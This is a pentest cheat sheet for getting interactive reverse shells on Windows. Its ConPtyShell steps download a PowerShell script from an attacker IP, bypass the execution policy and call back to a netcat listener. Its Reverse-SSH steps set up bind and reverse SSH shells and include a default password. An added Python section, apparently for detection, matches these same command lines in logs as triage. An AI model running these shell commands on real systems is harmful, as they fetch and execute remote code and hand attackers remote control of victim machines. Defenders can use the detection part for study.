🪟Windows Shell Upgrades
ConPtyShell
Victim
Invoke-WebRequest -Uri http://192.168.45.159:8080/Invoke-ConPtyShell.ps1 -OutFile .\Invoke-ConPtyShell.ps1
Set-ExecutionPolicy Bypass -Scope Process -Force
. .\Invoke-ConPtyShell.ps1
Invoke-ConPtyShell 192.168.45.159 3001
Attacker
stty raw -echo; (stty size; cat) | rlwrap nc -lvnp 3001
Reverse-SSH
Bind method
Victim
./reverse-ssh
Attacker (default password: letmeinbrudipls)
ssh -p 31337 <RHOST>
Reverse shell method
1- Attacker
reverse-ssh -v -l -p 31337
2- Victim
.\reverse-ssh.exe -p 31337 192.168.45.182
3- Attacker
ssh -p 8888 127.0.0.1
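Detection-side view of both sections above (ConPtyShell and Reverse-SSH), as an added example that is not part of the original page: a Python triage pass over process-creation or script-block command lines, matching the commands shown here. The rule names, host names, the 192.0.2.10 address and the sample records are constructed for illustration.

```python
import re
from collections import defaultdict

# Patterns derived from the command lines on this page; rule names are made up here.
RULES = {
    "conptyshell_invoke": re.compile(r"\bInvoke-ConPtyShell\b(?!\.ps1)", re.I),
    "ps1_download": re.compile(r"\bInvoke-WebRequest\b.*-OutFile\s+\S+\.ps1\b", re.I),
    "execpolicy_bypass": re.compile(r"\bSet-ExecutionPolicy\s+Bypass\b", re.I),
    "reverse_ssh_binary": re.compile(r"(^|[\\/\s])reverse-ssh(\.exe)?(\s|$)", re.I),
}
# Rules that are alert-worthy on their own; the others only count in combination.
HIGH = {"conptyshell_invoke", "reverse_ssh_binary"}

# Constructed records (host, command line), e.g. from process-creation or
# PowerShell script-block logs. Hosts and the 192.0.2.10 address are placeholders.
SAMPLE_EVENTS = [
    ("WS01", r"Invoke-WebRequest -Uri http://192.0.2.10:8080/Invoke-ConPtyShell.ps1 "
             r"-OutFile .\Invoke-ConPtyShell.ps1"),
    ("WS01", "Set-ExecutionPolicy Bypass -Scope Process -Force"),
    ("WS01", "Invoke-ConPtyShell 192.0.2.10 3001"),
    ("WS02", r".\reverse-ssh.exe -p 31337 192.0.2.10"),
    ("WS03", "Set-ExecutionPolicy Bypass -Scope Process -Force"),
    ("WS04", "ssh -p 22 admin@fileserver"),
]

def match_rules(cmdline):
    """Return the names of all rules that match one command line."""
    return {name for name, rx in RULES.items() if rx.search(cmdline)}

def triage(events):
    """Group matches per host and rate each host that had at least one hit."""
    hits = defaultdict(set)
    for host, cmdline in events:
        hits[host] |= match_rules(cmdline)
    report = {}
    for host, names in hits.items():
        if names:
            # One strong indicator, or any two indicators on the same host, is "high".
            severity = "high" if names & HIGH or len(names) >= 2 else "low"
            report[host] = (severity, sorted(names))
    return report

if __name__ == "__main__":
    for host, (severity, names) in sorted(triage(SAMPLE_EVENTS).items()):
        print(f"{host}: {severity} {', '.join(names)}")
```

Name-based matches only cover the file and function names as they appear on this page, so treat a hit as a triage lead and confirm it against the host's network connections.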